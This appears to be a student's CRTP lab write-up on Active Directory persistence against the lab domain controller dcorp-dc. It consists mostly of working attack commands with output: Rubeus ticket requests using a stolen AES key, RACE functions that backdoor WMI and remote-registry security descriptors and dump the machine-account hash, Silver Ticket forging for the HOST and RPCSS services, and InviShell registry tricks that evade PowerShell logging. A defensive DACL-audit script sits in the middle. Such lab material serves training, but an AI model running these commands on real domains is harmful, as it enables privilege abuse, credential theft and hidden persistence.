CRTP Lab 13
Task 1
Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access.
Open elevated DA cmd:
#ArgSplit asktgt
#Open DA cmd:
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
After we get the shell as DA, run InviShell and import RACE.
#InviShell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
# Import RACE
. C:\AD\Tools\RACE.ps1
Next, we give student the same permissions as the Built-in Administrators group (BA) on the root\cimv2 WMI namespace:
Set-RemoteWMI -SamAccountName student372 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose
We have modified the security descriptor, so we can now execute WMI queries against dcorp-dc as student from a non-administrative cmd:
gwmi -class win32_operatingsystem -ComputerName dcorp-dc
SystemDirectory : C:\Windows\system32
Organization :
BuildNumber : 20348
RegisteredUser : Windows User
SerialNumber : 00454-30000-00000-AA745
Version : 10.0.20348
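As an added defender-side check (not part of the lab or the RACE toolkit), the following PowerShell audits the DACL of a WMI namespace on a remote host and flags any trustee outside the stock default set that holds remote-enable, full-write or write-DAC rights, which is exactly the kind of entry a change like Set-RemoteWMI leaves behind. The host and namespace names are taken from this lab; the baseline trustee list is assumed for a default Windows install, and the caller needs admin rights on the target.

```powershell
# Added example, not from the CRTP lab or RACE: audit a remote WMI namespace DACL
param(
    [string]$ComputerName = 'dcorp-dc',   # assumed lab host name
    [string]$Namespace    = 'root\cimv2'  # namespace modified in Task 1
)

# WMI namespace access-mask bits (WBEM_* constants from wbemcli.h)
$Rights = [ordered]@{
    Enable        = 0x00001
    MethodExecute = 0x00002
    FullWrite     = 0x00004
    PartialWrite  = 0x00008
    ProviderWrite = 0x00010
    RemoteEnable  = 0x00020
    ReadControl   = 0x20000
    WriteDAC      = 0x40000
}
# Rights that let a principal use or reshape the namespace remotely
$Sensitive = $Rights.RemoteEnable -bor $Rights.FullWrite -bor $Rights.WriteDAC

# Trustees present in the default root\cimv2 DACL on a stock install (assumed baseline)
$Baseline = @(
    'BUILTIN\Administrators', 'NT AUTHORITY\NETWORK SERVICE',
    'NT AUTHORITY\LOCAL SERVICE', 'NT AUTHORITY\Authenticated Users'
)

# __SystemSecurity.GetSecurityDescriptor returns the namespace SD as a __SecurityDescriptor
$sd = (Invoke-WmiMethod -ComputerName $ComputerName -Namespace $Namespace `
        -Path '__SystemSecurity=@' -Name GetSecurityDescriptor).Descriptor

foreach ($ace in $sd.DACL) {
    $who  = if ($ace.Trustee.Domain) { "$($ace.Trustee.Domain)\$($ace.Trustee.Name)" } else { $ace.Trustee.Name }
    $held = $Rights.GetEnumerator() |
            Where-Object { ($ace.AccessMask -band $_.Value) -ne 0 } |
            ForEach-Object { $_.Key }
    [pscustomobject]@{
        Trustee    = $who
        SID        = $ace.Trustee.SIDString
        AceType    = if ($ace.AceType -eq 0) { 'Allow' } else { 'Deny' }
        Rights     = ($held -join ',')
        # Allow ACE for a trustee outside the baseline that carries a sensitive right
        Suspicious = ($ace.AceType -eq 0) -and
                     ($Baseline -notcontains $who) -and
                     (($ace.AccessMask -band $Sensitive) -ne 0)
    }
}
```

Run it against the DC after Task 1 and the student372 ACE shows up with Suspicious = True; the same loop can be pointed at other namespaces by changing -Namespace.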
Task 2
Retrieve machine account hash from dcorp-dc without using administrator access and use that to execute a Silver Ticket attack to get code execution with WMI.
Before we retrieve the machine account hash, we need to modify permissions on the DC.
# Spawn a new Powershell.
powershell
. C:\AD\Tools\RACE.ps1
Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee student372 -Verbose
ComputerName BackdoorTrustee
------------ ---------------
dcorp-dc.dollarcorp.moneycorp.local student372
Since student372 has been added as the backdoor trustee, we can retrieve the hash as student372.
# Spawn new powershell
. C:\AD\Tools\RACE.ps1
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
ComputerName MachineAccountHash
------------ ------------------
dcorp-dc 0a05dd30b8f44589c534dcd951c765b6
Using the machine account hash, we can run a Silver Ticket attack for the HOST and RPCSS services:
# Host
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:0a05dd30b8f44589c534dcd951c765b6 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
# RPCSS
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /rc4:0a05dd30b8f44589c534dcd951c765b6 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
PS Remoting:
C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
C:\AD\Tools>set COR_ENABLE_PROFILING=1
C:\AD\Tools>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}
C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
The operation completed successfully.
C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /f
The operation completed successfully.
C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /ve /t REG_SZ /d "C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.
C:\AD\Tools>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\AD\Tools> . C:\AD\Tools\RACE.ps1
PS C:\AD\Tools> Set-RemotePSRemoting -SamAccountName student372 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose
[dcorp-dc.dollarcorp.moneycorp.local] Processing data from remote server dcorp-dc.dollarcorp.moneycorp.local failed
with the following error message: The I/O operation has been aborted because of either a thread exit or an application
request. For more information, see the about_Remote_Troubleshooting Help topic.
+ CategoryInfo : OpenError: (dcorp-dc.dollarcorp.moneycorp.local:String) [], PSRemotingTransportException
+ FullyQualifiedErrorId : WinRMOperationAborted,PSSessionStateBroken
PS C:\AD\Tools>